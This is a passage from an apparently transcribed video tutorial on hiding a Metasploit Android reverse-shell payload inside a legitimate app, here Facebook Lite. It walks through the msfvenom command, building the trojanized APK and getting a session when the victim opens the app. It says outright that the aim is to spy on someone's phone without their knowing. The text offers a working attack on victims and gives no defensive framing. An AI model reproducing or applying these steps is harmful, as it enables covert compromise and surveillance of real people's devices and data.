an Android device using Metasploit. And in that video we also created this update.apk file and sent the file to the victim's Android phone, and which results in this main activity application. And once he or she launches it, you will get a Metasploit session. But in practical that's not possible, because I can't really imagine a guy who is dumb enough to keep this application on his phone and click it. It's not practical at all. So in this video I'm gonna be showing guys how to inject the payload into an original application. An original application such as Facebook or YouTube, how to combine them and use them to get a Metasploit session. So let me just quickly start a listener on my Metasploit framework. I'm gonna skip this one because you all know how to do this. So I have started a listener, and as you can see it's listening on this port. Since the application is persistent, it has given me a Metasploit session. Let me just do a quick exit, do an exploit and launch this application, and I get a Metasploit session. But as I said earlier, it's not practical. So let's begin with how to inject the payload into an original APK file. Let me just quickly remove this application. So before starting, we are gonna need an APK file. So let's think of an app that people are gonna use on daily basis and they are not gonna remove it anytime soon. So Facebook application would be a great candidate. So let me just head over to www.facebook.com/lite. So in this video I'm gonna be using the Facebook Lite because it's light in nature and you can easily copy and install this application. So I have this Facebook Lite APK right here. I'm gonna inject the Metasploit payload into this application, and we are gonna install this application on our Android device and see if we can get a Metasploit session. So open up a new terminal, do su for super user access. We're gonna use MSF Venom -x space Facebook Lite -p space the name of the payload Android/Metasploit reverse TCP. Lhost equals your IP address, lport equals the port, 8080-o space the name of the file you want to give. Let's just call it Facebook loaded.apk. Now this should decompile the original APK and inject the payload inside that APK and recompile the APK in order to create the an APK with a payload inside it. Now this could take a little bit of time, so have patience. I'm gonna speed up this video. Okay, so finally it has created the Facebook loaded.apk, which is the APK with the payload inside it. So let me just close this one. Now we have our listener. So here's the listener, here's the APK. So I'm gonna set this to my virtual Android phone, and as you can see I have successfully got the Metasploit session, and this is the Facebook app and it works pretty well. We have the Facebook Lite application here. Let me just exit and again listen. Once I open this application, once I open the application, I get the Metasploit session. You could do this a million times, but still you are gonna get the Metasploit session. See, it works pretty well. So this is how you can install a payload inside someone's Android phone to spy on them, and they wouldn't even know that it's there. They're gonna use the application like normal, but they are not gonna know that it has a payload inside it. Thank you guys for watching. I hope you enjoyed this video, and